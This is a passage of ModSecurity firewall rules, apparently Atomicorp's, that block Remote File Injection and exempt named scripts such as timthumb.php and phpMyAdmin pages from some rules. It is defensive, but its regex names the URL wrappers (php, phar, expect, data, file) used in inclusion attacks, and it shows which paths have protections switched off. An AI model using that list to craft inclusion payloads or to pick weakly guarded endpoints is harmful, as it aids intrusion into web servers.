SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:mirror|!ARGS:ftp_server "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340721,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91303

SecRule REQUEST_FILENAME "/pap\.swf" "phase:2,id:91304,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91305,t:none,pass,nolog,skipAfter:END_RULES_91305"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:v1 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340722,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:v1 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340723,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91305

SecRule REQUEST_FILENAME "/fckeditor\.html" "phase:2,id:91306,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91307,t:none,pass,nolog,skipAfter:END_RULES_91307"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:CustomConfigurationsPath "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,id:340724,phase:2,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:CustomConfigurationsPath "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340725,phase:2,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91307

SecRule REQUEST_FILENAME "/timthumb\.php" "phase:2,id:91308,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91309,t:none,pass,nolog,skipAfter:END_RULES_91309"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "capture,phase:2,deny,log,auditlog,status:403,id:340726,chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "capture,phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340727,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"


SecMarker END_RULES_91309

SecRule REQUEST_FILENAME "/phpthumb\.php" "phase:2,id:91310,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91311,t:none,pass,nolog,skipAfter:END_RULES_91311"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "capture,phase:2,deny,log,auditlog,status:403,id:375726,chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "capture,phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:375737,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"


SecMarker END_RULES_91311

SecRule REQUEST_FILENAME "/phpthumb/phpthumb\.php" "phase:2,id:91312,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91313,t:none,pass,nolog,skipAfter:END_RULES_91313"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "capture,phase:2,deny,log,auditlog,status:403,id:376726,chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "capture,phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:375727,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"

SecMarker END_RULES_91313

SecRule REQUEST_FILENAME "/upload\.php" "phase:2,id:91314,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"


SecRule REQUEST_FILENAME "/idevaffiliate/admin/setup\.php" "phase:2,id:91315,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91316,t:none,pass,nolog,skipAfter:END_RULES_91316"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:full_path "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,id:340730,phase:2,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:full_path "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340731,phase:2,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91316

SecRule REQUEST_FILENAME "/install/index\.php" "phase:2,id:91317,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/tbl_create\.php" "phase:2,id:91318,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/view_create\.php" "phase:2,id:91319,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/tbl_select\.php" "phase:2,id:91320,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/tbl_addfield\.php" "phase:2,id:91321,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/tbl_change\.php" "phase:2,id:91322,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/phpmyadmin/" "phase:2,id:91323,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/movieonline\.php" "phase:2,id:91324,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91325,t:none,pass,nolog,skipAfter:END_RULES_91325"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:list "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340732,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:list "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340733,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91325

SecRule REQUEST_FILENAME "/listings/client\.php" "phase:2,id:91326,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91327,t:none,pass,nolog,skipAfter:END_RULES_91327"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:line3 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340734,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:line3 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340735,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91327

SecRule REQUEST_FILENAME "/test_index\.php" "phase:2,id:91328,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91329,t:none,pass,nolog,skipAfter:END_RULES_91329"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:rf "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340736,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:rf "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340737,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91329

SecRule REQUEST_FILENAME "/recommend\.cgi" "phase:2,id:91330,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91331,t:none,pass,nolog,skipAfter:END_RULES_91331"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:name "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340738,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:name "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340739,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91331

SecRule REQUEST_FILENAME "/goodscounter\.php" "phase:2,id:91332,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340151"
SecAction "phase:2,id:91333,t:none,pass,nolog,skipAfter:END_RULES_91333"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:u|!ARGS:cof|!ARGS:ureferrer "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340740,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:u|!ARGS:cof|!ARGS:ureferrer "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340741,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91333

SecRule REQUEST_FILENAME "/fla_video\.swf" "phase:2,id:91334,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/admin/admin_board\.php" "phase:2,id:91335,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91336,t:none,pass,nolog,skipAfter:END_RULES_91336"

